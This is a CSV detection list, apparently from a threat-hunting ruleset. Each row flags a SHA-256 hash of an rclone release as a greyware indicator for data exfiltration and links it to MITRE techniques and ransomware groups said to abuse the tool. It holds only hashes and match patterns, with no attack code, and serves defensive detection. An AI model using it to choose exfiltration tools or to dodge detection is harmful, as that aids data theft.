"*4f8c65b3b3f90219d93517f3f1535fd8790d8c8e9fdf3ae1aecafeb1ff6cefee*",".{0,1000}4f8c65b3b3f90219d93517f3f1535fd8790d8c8e9fdf3ae1aecafeb1ff6cefee.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4f8dc1238de611812f0965d1e1d70b45700ad30d7ed7abec4c44a2de0c72eb44*",".{0,1000}4f8dc1238de611812f0965d1e1d70b45700ad30d7ed7abec4c44a2de0c72eb44.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*500a0ba45a24b5ddcffc791bb90fa837cb2308bebc08ae647951d9f63f8ff49b*",".{0,1000}500a0ba45a24b5ddcffc791bb90fa837cb2308bebc08ae647951d9f63f8ff49b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*5088a7aeb3f0ebeee5ce2825791f72abaa1595757fa7908869e43ec6a81825ea*",".{0,1000}5088a7aeb3f0ebeee5ce2825791f72abaa1595757fa7908869e43ec6a81825ea.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*509cd53e52ba513aa2ca1198018a52a117b87cc451fdd62a0556d1128d389216*",".{0,1000}509cd53e52ba513aa2ca1198018a52a117b87cc451fdd62a0556d1128d389216.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*51077d58b8a21e5387ab74037c547bd62e990ccd4923a0abe2983d5225b3290e*",".{0,1000}51077d58b8a21e5387ab74037c547bd62e990ccd4923a0abe2983d5225b3290e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*514e482dab807fa09c219ed32c4899ed0783f4b040bbee4168959024707ed8e4*",".{0,1000}514e482dab807fa09c219ed32c4899ed0783f4b040bbee4168959024707ed8e4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*51b8d39b8fd419868d91ed5d0d0a22fb80d943f3fd3bab645c5498a3ad8b3dd9*",".{0,1000}51b8d39b8fd419868d91ed5d0d0a22fb80d943f3fd3bab645c5498a3ad8b3dd9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*51dd805d2d76208788ad35688d34005c4494d2aa28f7ea7f848c94975798ab11*",".{0,1000}51dd805d2d76208788ad35688d34005c4494d2aa28f7ea7f848c94975798ab11.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*52067f237835fbb545249f2fe8a05ed32cbeea63b7d0f8ee05fe4ec7411b04c1*",".{0,1000}52067f237835fbb545249f2fe8a05ed32cbeea63b7d0f8ee05fe4ec7411b04c1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*522304b37a88a2c916a5aa39eb10a66f1cf5b4cff84acc42f0a9e86b2c924518*",".{0,1000}522304b37a88a2c916a5aa39eb10a66f1cf5b4cff84acc42f0a9e86b2c924518.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*52431af4c26b941b8f6cc502f60658365b541e1cf4f184edf061b6954e68af72*",".{0,1000}52431af4c26b941b8f6cc502f60658365b541e1cf4f184edf061b6954e68af72.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*526336cdc3fddd60a43255912e954c4703e60f180d128525e0691e0e254664ec*",".{0,1000}526336cdc3fddd60a43255912e954c4703e60f180d128525e0691e0e254664ec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*52d8411745d949cc0cfd878f2e14f5f570d8a8d794eba6c3cf985a4aa51a1240*",".{0,1000}52d8411745d949cc0cfd878f2e14f5f570d8a8d794eba6c3cf985a4aa51a1240.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*5315025fbefc69c96b6e0637a33dc04bcfc09f552729f8076e195d862f9f342a*",".{0,1000}5315025fbefc69c96b6e0637a33dc04bcfc09f552729f8076e195d862f9f342a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*532c94a27dc1bae87411516b1253b2dddf14b7b976eea8f1deb01b248d6c3fda*",".{0,1000}532c94a27dc1bae87411516b1253b2dddf14b7b976eea8f1deb01b248d6c3fda.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*533285c177f817601c35476ccbb9698e431dd750bb73204b51d01bf629846fac*",".{0,1000}533285c177f817601c35476ccbb9698e431dd750bb73204b51d01bf629846fac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*5334aa63bb61e334a71e158f7baa7a068aeab0dafab61705b2e2113cfb8b979b*",".{0,1000}5334aa63bb61e334a71e158f7baa7a068aeab0dafab61705b2e2113cfb8b979b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*53a53833d6191071e399d93a26ac14d3de37230307d39b212b9b559166570137*",".{0,1000}53a53833d6191071e399d93a26ac14d3de37230307d39b212b9b559166570137.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*53b2e9c017c4c1d1f093b138c33eb4164ecea8d144880beca5702235e0665e54*",".{0,1000}53b2e9c017c4c1d1f093b138c33eb4164ecea8d144880beca5702235e0665e54.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*53b3f89f8d660c19c4c5952d4c24d283b5c3f55d0925a2fa787142c9598a5fb4*",".{0,1000}53b3f89f8d660c19c4c5952d4c24d283b5c3f55d0925a2fa787142c9598a5fb4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*53c4b484b2e364b02eeb3c44214a583d6fb0d052a4cd2896e0c1f5c40dba7478*",".{0,1000}53c4b484b2e364b02eeb3c44214a583d6fb0d052a4cd2896e0c1f5c40dba7478.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*53cbc5aa0c6be1872b867ca98c4eddbb422dcedb3f2c117952a1ebf29eea797e*",".{0,1000}53cbc5aa0c6be1872b867ca98c4eddbb422dcedb3f2c117952a1ebf29eea797e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*5434f4040ed0c1d4d786ace61ce8044f2b4a260255fd507f572e253caf72dddc*",".{0,1000}5434f4040ed0c1d4d786ace61ce8044f2b4a260255fd507f572e253caf72dddc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*545291fd6c9ab6766c7997e4e8869a1f09597c8a6947414142b68223c6f9776f*",".{0,1000}545291fd6c9ab6766c7997e4e8869a1f09597c8a6947414142b68223c6f9776f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*54686bfabdfc31cb280a9030fc646b3d147d6021d9d798b637259fcc88a752e9*",".{0,1000}54686bfabdfc31cb280a9030fc646b3d147d6021d9d798b637259fcc88a752e9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*546d13242dd655fc2d405892c30adad1a6cc071b77a5779fc8f4bb0614595d85*",".{0,1000}546d13242dd655fc2d405892c30adad1a6cc071b77a5779fc8f4bb0614595d85.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*546f10834f36cb9596b23e7ed2551c6ea485f3bdef9dd2475b840eb95894e1d8*",".{0,1000}546f10834f36cb9596b23e7ed2551c6ea485f3bdef9dd2475b840eb95894e1d8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*5490ece8bcd8e5f083b72bd48614d6945e460f8dc8c9aa8e9db0cac54f8568f0*",".{0,1000}5490ece8bcd8e5f083b72bd48614d6945e460f8dc8c9aa8e9db0cac54f8568f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*54bcac89bc7735d425b3b86f8fee042566e6f02ab69feba29bafcffeec072b20*",".{0,1000}54bcac89bc7735d425b3b86f8fee042566e6f02ab69feba29bafcffeec072b20.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*54f263712d02bf2345eb5a3444aa4f07b990f5b4c6d02f1de892d1ff8028b50c*",".{0,1000}54f263712d02bf2345eb5a3444aa4f07b990f5b4c6d02f1de892d1ff8028b50c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*55af8b379dafa474233959948f4daf6bcdf49c03dff322c2e4032e2db394fad0*",".{0,1000}55af8b379dafa474233959948f4daf6bcdf49c03dff322c2e4032e2db394fad0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*56408aa221735b093510a8ea124b7b54df6054c70e8970f833373515595c3c8d*",".{0,1000}56408aa221735b093510a8ea124b7b54df6054c70e8970f833373515595c3c8d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*5664616dada91457f2e4241e69105952b97e4ffce83b030ac1c0f459799e76e9*",".{0,1000}5664616dada91457f2e4241e69105952b97e4ffce83b030ac1c0f459799e76e9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*56754f477bd8f5415c5b0f26346928a698bcc7c6665d72fe2fe746c3b36bccb0*",".{0,1000}56754f477bd8f5415c5b0f26346928a698bcc7c6665d72fe2fe746c3b36bccb0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*56af38e429f5b4ddb7e23875122dac06e86f71414251f989bd096cbbc836c3e8*",".{0,1000}56af38e429f5b4ddb7e23875122dac06e86f71414251f989bd096cbbc836c3e8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 